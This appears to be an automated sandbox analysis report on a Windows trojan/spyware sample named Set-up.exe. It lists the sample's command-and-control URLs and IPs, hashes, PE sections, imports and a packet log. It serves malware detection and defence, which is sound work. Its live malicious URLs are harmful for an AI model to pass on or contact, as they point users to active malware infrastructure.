http://home.eleventj11vt.top/olN	100%	Avira URL Cloud	malware
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435963	100%	Avira URL Cloud	malware
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdR435	100%	Avira URL Cloud	malware
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435?argument=0s	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
home.eleventj11vt.top	34.147.147.173	true	false		high
httpbin.org	34.200.57.114	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435	true	Avira URL Cloud: malware	unknown
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435?argument=0	true	Avira URL Cloud: malware	unknown
https://httpbin.org/ip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	Set-up.exe	false		high
http://html4/loose.dtd	Set-up.exe	false		high
https://httpbin.org/ipbefore	Set-up.exe	false		high
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435http://home.eleventj11vt.top/olN	Set-up.exe, 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: malware	unknown
https://curl.se/docs/http-cookies.html	Set-up.exe	false		high
https://curl.se/docs/hsts.html#	Set-up.exe	false		high
http://home.eleventj11vt.top/olN	Set-up.exe, 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: malware	unknown
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435se	Set-up.exe, 00000000.00000003.1875829833.0000000001BF2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1877214773.0000000001BFB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1875909037.0000000001BFA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1875663648.0000000001BED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1875889597.0000000001BF6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435963	Set-up.exe, 00000000.00000003.1875829833.0000000001BF2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1877214773.0000000001BFB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1875909037.0000000001BFA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1875663648.0000000001BED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1875889597.0000000001BF6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://curl.se/docs/alt-svc.html	Set-up.exe	false		high
http://.css	Set-up.exe	false		high
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdR435	Set-up.exe	false	Avira URL Cloud: malware	unknown
http://.jpg	Set-up.exe	false		high
http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435?argument=0s	Set-up.exe, 00000000.00000003.1875829833.0000000001BF2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1877214773.0000000001BFB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1875909037.0000000001BFA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1875663648.0000000001BED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1875889597.0000000001BF6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
34.147.147.173	home.eleventj11vt.top	United States		2686	ATGS-MMD-ASUS	false
34.200.57.114	httpbin.org	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582848
Start date and time:	2024-12-31 16:46:36 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Set-up.exe
Detection:	MAL
Classification:	mal76.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 85% Number of executed functions: 50 Number of non-executed functions: 157
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.147.147.173	TX5LAYBZRI.exe	Get hash	malicious	Unknown	Browse	home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
	XJiB3BdLTg.exe	Get hash	malicious	Unknown	Browse	home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
	Bo6uO5gKL4.exe	Get hash	malicious	Unknown	Browse	home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
34.200.57.114	TX5LAYBZRI.exe	Get hash	malicious	Unknown	Browse
	joE9s9sbv0.exe	Get hash	malicious	Unknown	Browse
	Bo6uO5gKL4.exe	Get hash	malicious	Unknown	Browse
	JbN2WYseAr.exe	Get hash	malicious	Unknown	Browse
	r8nllkNEQX.exe	Get hash	malicious	Unknown	Browse
	ivHDHq51Ar.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
home.eleventj11vt.top	Set-up.exe	Get hash	malicious	Unknown	Browse	194.87.58.155
httpbin.org	TX5LAYBZRI.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	Prs9eAnu2k.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	joE9s9sbv0.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	XJiB3BdLTg.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	Bo6uO5gKL4.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	JbN2WYseAr.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	r8nllkNEQX.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	yqUQPPp0LM.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	ivHDHq51Ar.exe	Get hash	malicious	Unknown	Browse	34.200.57.114

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	TX5LAYBZRI.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	Prs9eAnu2k.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	joE9s9sbv0.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	XJiB3BdLTg.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	Bo6uO5gKL4.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	JbN2WYseAr.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	r8nllkNEQX.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	yqUQPPp0LM.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	ivHDHq51Ar.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
ATGS-MMD-ASUS	TX5LAYBZRI.exe	Get hash	malicious	Unknown	Browse	34.147.147.173
	XJiB3BdLTg.exe	Get hash	malicious	Unknown	Browse	34.147.147.173
	Bo6uO5gKL4.exe	Get hash	malicious	Unknown	Browse	34.147.147.173
	http://usps.com-trackaddn.top/l	Get hash	malicious	Unknown	Browse	34.54.88.138
	cbr.x86.elf	Get hash	malicious	Mirai	Browse	57.13.227.38
	https://gogl.to/3HGT	Get hash	malicious	CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	34.36.178.232
	kwari.ppc.elf	Get hash	malicious	Unknown	Browse	48.233.101.215
	kwari.arm.elf	Get hash	malicious	Unknown	Browse	57.204.182.195
	kwari.mpsl.elf	Get hash	malicious	Unknown	Browse	57.206.149.213

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	5.909645086783083
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Set-up.exe
File size:	7'793'288 bytes
MD5:	3d060ec62ad0864cfd0d40f46a4f07a9
SHA1:	8caba4598d19477a1e4442c4c710fa3909023c5b
SHA256:	6f80bb8b470640ae7542eb1b239f2a790d61047254accccf747c4d64907fec66
SHA512:	40e7f3407eec75b9ea5027387e2e5de294e6131f6ef00cda7640a6fb93a7e514683895066e509df817fd4de85854969fba8d01dedb40826e4bb59e28981f127d
SSDEEP:	49152:zINwrsavev5BI2tev8aclalc6UnNaxT1jvwgJr0vJnWShbKsqBIKTlblgPyz8wA/:zIQsX5BMvh64cxnMxRjVJQxPKTSyz8/
TLSH:	A8763951EE8790F9C58315715016B37F6E34AF00A835DEB6CFD1FB34DA72A12AA0E618
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....sg...............(..K...v..2...........0K...@..........................pw.....5.v...@... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6773C307 [Tue Dec 31 10:10:15 2024 UTC]
TLS Callbacks:	0x7890e0, 0x789090
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	51b39aff649af7abc30a06f2362db069

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US
Signature Validation Error:	A certificate chain could not be built to a trusted root authority
Error Number:	-2146762486
Not Before, Not After	26/08/2024 17:01:06 21/08/2025 17:01:06
Subject Chain	CN=www.microsoft.com, O=Microsoft Corporation, L=Redmond, S=WA, C=US
Version:	3
Thumbprint MD5:	80B98BC56A1BC892D2F111169DBCB122
Thumbprint SHA-1:	ED3C9DEEB4AD4483F925E20DD4695116DADC4D67
Thumbprint SHA-256:	0A1BB301BB5F2A584E394CCF57086623A464843269DD8A115FA4FC3509DB3EDC
Serial:	33009F7B734DB0480411EB0BBA0000009F7B73

Entrypoint Preview

Instruction
mov dword ptr [00B3B658h], 00000001h
jmp 00007FC3ACB3D8E6h
nop
mov dword ptr [00B3B658h], 00000000h
jmp 00007FC3ACB3D8D6h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007FC3ACEC5146h
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 009E2000h
call dword ptr [00B3D9A8h]
sub esp, 04h
test eax, eax
je 00007FC3ACB3DCA5h
mov ebx, eax
mov dword ptr [esp], 009E2000h
call dword ptr [00B3DA1Ch]
mov edi, dword ptr [00B3D9BCh]
sub esp, 04h
mov dword ptr [00B39028h], eax
mov dword ptr [esp+04h], 009E2013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 009E2029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [008B3004h], eax
test esi, esi
je 00007FC3ACB3DC43h
mov dword ptr [esp+04h], 00B3902Ch
mov dword ptr [esp], 00B34104h
call esi
mov dword ptr [esp], 00401580h
call 00007FC3ACB3DB93h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73d000	0x2dac	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x76e400	0x688	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x742000	0x3441c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x729c20	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x73d814	0x620	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4b1afc	0x4b1c00	0376523a3320321e6f615080586e83ab	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x4b3000	0x12e024	0x12e200	5b3503c3e26e0a34435a86db21560bd8	False	0.020004783822920976	dBase III DBT, version number 0, next free block index 10, 1st item "1={"	0.29475031293532666	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x5e2000	0x151a58	0x151c00	879e9493847d67b979679fddd1d64dca	False	0.42061941964285715	data	6.277693877886275	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x734000	0x4d64	0x4e00	6c17222928a7366f1135f39586b97ba6	False	0.3195612980769231	data	4.898658234523789	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x739000	0x3180	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x73d000	0x2dac	0x2e00	567768f33a53c46b0def6d69e22b7524	False	0.36931046195652173	data	5.457987373518599	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x740000	0x30	0x200	fe2a65d4187b984679c52ae93485940e	False	0.0625	data	0.2233456448570176	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x741000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x742000	0x3441c	0x34600	02e0623c7d8d841233f429ead242f2e6	False	0.49903975238663484	data	6.65692879978424	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptAcquireContextW, CryptCreateHash, CryptDecrypt, CryptDestroyHash, CryptDestroyKey, CryptEnumProvidersW, CryptExportKey, CryptGenRandom, CryptGetHashParam, CryptGetProvParam, CryptGetUserKey, CryptHashData, CryptReleaseContext, CryptSetHashParam, CryptSignHashW, DeregisterEventSource, RegCloseKey, RegEnumKeyExA, RegNotifyChangeKeyValue, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegisterEventSourceW, ReportEventW, SystemFunction036
bcrypt.dll	BCryptGenRandom
CRYPT32.dll	CertCloseStore, CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertFindCertificateInStore, CertFreeCertificateContext, CertGetCertificateContextProperty, CertGetEnhancedKeyUsage, CertGetIntendedKeyUsage, CertOpenStore, CertOpenSystemStoreA, CertOpenSystemStoreW
GDI32.dll	BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, DeleteDC, DeleteObject, GetDeviceCaps, SelectObject
gdiplus.dll	GdipGetImageEncoders, GdipGetImageEncodersSize, GdiplusShutdown, GdiplusStartup
IPHLPAPI.DLL	ConvertInterfaceIndexToLuid, ConvertInterfaceLuidToNameA, FreeMibTable, GetAdaptersAddresses, GetBestRoute2, GetUnicastIpAddressTable, if_indextoname, if_nametoindex
KERNEL32.dll	AcquireSRWLockExclusive, CancelIo, CloseHandle, CompareFileTime, ConvertFiberToThread, ConvertThreadToFiberEx, CreateEventA, CreateFiberEx, CreateFileA, CreateFileMappingA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreW, CreateThread, CreateToolhelp32Snapshot, DeleteCriticalSection, DeleteFiber, EnterCriticalSection, ExpandEnvironmentStringsA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileW, FormatMessageW, FreeLibrary, GetACP, GetConsoleMode, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceExA, GetDriveTypeA, GetEnvironmentVariableA, GetEnvironmentVariableW, GetFileAttributesA, GetFileType, GetLastError, GetLogicalDriveStringsA, GetModuleFileNameA, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOverlappedResult, GetProcAddress, GetProcessHeap, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTime, GetSystemTimeAsFileTime, GetThreadLocale, GetTickCount64, GetTickCount, GetTimeZoneInformation, GetVersion, GetVersionExA, GlobalMemoryStatusEx, HeapAlloc, HeapFree, InitializeConditionVariable, InitializeCriticalSection, IsBadReadPtr, IsDBCSLeadByteEx, K32EnumProcesses, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, MapViewOfFile, MoveFileExA, MultiByteToWideChar, OpenProcess, PeekNamedPipe, PostQueuedCompletionStatus, Process32First, Process32Next, QueryFullProcessImageNameA, QueryPerformanceCounter, QueryPerformanceFrequency, ReadConsoleA, ReadConsoleW, ReadFile, RegisterWaitForSingleObject, ReleaseSRWLockExclusive, ReleaseSemaphore, SetConsoleMode, SetFileCompletionNotificationModes, SetHandleInformation, SetLastError, SetUnhandledExceptionFilter, Sleep, SleepConditionVariableCS, SleepEx, SwitchToFiber, SystemTimeToFileTime, TlsAlloc, TlsGetValue, TlsSetValue, UnmapViewOfFile, UnregisterWait, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, VirtualLock, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitNamedPipeA, WakeAllConditionVariable, WakeConditionVariable, WideCharToMultiByte, WriteFile, lstrlenA
msvcrt.dll	__mb_cur_max, __setusermatherr, _findclose, _fullpath, _lock, _strnicmp, _unlock, getc, islower, isxdigit, localeconv, ungetc, vfprintf, _findnext, _findfirst, _open
ole32.dll	CreateStreamOnHGlobal
SHELL32.dll	SHGetKnownFolderPath
api-ms-win-crt-convert-l1-1-0.dll	atoi, mbstowcs, strtol, strtoll, strtoul, wcstombs
api-ms-win-crt-environment-l1-1-0.dll	__p__environ, __p__wenviron, getenv
api-ms-win-crt-filesystem-l1-1-0.dll	_fstat64, _stat64, _unlink
api-ms-win-crt-heap-l1-1-0.dll	_set_new_mode, calloc, free, malloc, realloc
api-ms-win-crt-locale-l1-1-0.dll	setlocale
api-ms-win-crt-math-l1-1-0.dll	_fdopen
api-ms-win-crt-private-l1-1-0.dll	memchr, memcmp, memcpy, memmove, strchr, strrchr, strstr, wcsstr
api-ms-win-crt-runtime-l1-1-0.dll	_set_app_type, __p___argc, __p___argv, __p___wargv, __p__acmdln, __sys_errlist, __sys_nerr, _assert, _cexit, _configure_narrow_argv, _configure_wide_argv, _crt_at_quick_exit, _crt_atexit, _errno, _exit, _fpreset, _initialize_narrow_environment, _initialize_wide_environment, _initterm, _set_invalid_parameter_handler, abort, exit, raise, signal, strerror
api-ms-win-crt-stdio-l1-1-0.dll	__acrt_iob_func, __p__commode, __p__fmode, __stdio_common_vfwprintf, __stdio_common_vsprintf, __stdio_common_vsscanf, __stdio_common_vswprintf, _fileno, _fseeki64, _lseeki64, _wfopen, _write, fclose, feof, ferror, fflush, fgets, fopen, fputc, fputs, fread, fseek, ftell, fwrite, rewind, setvbuf, _write, _setmode, _read, _open, _fileno, _close
api-ms-win-crt-string-l1-1-0.dll	_strlwr_s, isspace, isupper, memset, strcat, strcmp, strcpy, strcspn, strlen, strncat, strncmp, strncpy, strpbrk, strspn, tolower, wcscat, wcscmp, wcscpy, wcslen, _wcsnicmp, _stricmp, _strdup, _strdup
api-ms-win-crt-time-l1-1-0.dll	__daylight, __timezone, __tzname, _difftime32, _difftime64, _gmtime64, _mktime64, _time32, _time64, _tzset, strftime
api-ms-win-crt-utility-l1-1-0.dll	_byteswap_uint64, bsearch, qsort, rand, srand
USER32.dll	CharUpperA, EnumDisplayMonitors, EnumWindows, FindWindowA, GetDC, GetProcessWindowStation, GetSystemMetrics, GetUserObjectInformationW, GetWindowTextA, MessageBoxW, ReleaseDC, SendMessageA
WS2_32.dll	WSACleanup, WSACloseEvent, WSACreateEvent, WSAEnumNetworkEvents, WSAEventSelect, WSAGetLastError, WSAIoctl, WSAResetEvent, WSASetEvent, WSASetLastError, WSAStartup, WSAStringToAddressW, WSAWaitForMultipleEvents, __WSAFDIsSet, accept, bind, closesocket, connect, gethostbyaddr, gethostbyname, gethostname, getpeername, getservbyname, getservbyport, getsockname, getsockopt, htonl, htons, inet_addr, inet_ntoa, ioctlsocket, listen, ntohl, ntohs, recv, recvfrom, select, send, sendto, setsockopt, shutdown, socket

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 16:47:27.234911919 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:47:27.234960079 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:47:27.235042095 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:47:27.238039017 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:47:27.238059044 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:47:27.896049976 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:47:27.896514893 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:47:27.896531105 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:47:27.897888899 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:47:27.898088932 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:47:27.899571896 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:47:27.899630070 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:47:27.907632113 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:47:27.907639027 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:47:27.956032038 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:47:28.053606033 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:47:28.053774118 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:47:28.053826094 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:47:28.054485083 CET	49730	443	192.168.2.4	34.200.57.114
Dec 31, 2024 16:47:28.054495096 CET	443	49730	34.200.57.114	192.168.2.4
Dec 31, 2024 16:47:41.844521999 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:41.850207090 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:41.850275993 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:41.851106882 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:41.856004000 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:41.856014013 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:41.856020927 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:41.856055021 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:41.856066942 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:41.856087923 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:41.856112003 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:41.856128931 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:41.856142044 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:41.856178045 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:41.856187105 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:41.856192112 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:41.856237888 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:41.856237888 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:41.856281042 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:41.860641956 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:41.860696077 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:41.861526012 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:41.861538887 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:41.861546993 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:41.861556053 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:41.861563921 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:41.861572027 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:41.861584902 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:41.861615896 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:41.861628056 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:41.908417940 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:41.908528090 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:41.956120014 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:41.956187010 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.002940893 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.002983093 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.050940037 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.050983906 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.099003077 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.099050999 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.146931887 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.146977901 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.194921017 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.194971085 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.242939949 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.242989063 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.278127909 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.278283119 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.283148050 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.283158064 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.283174038 CET	80	49731	34.147.147.173	192.168.2.4
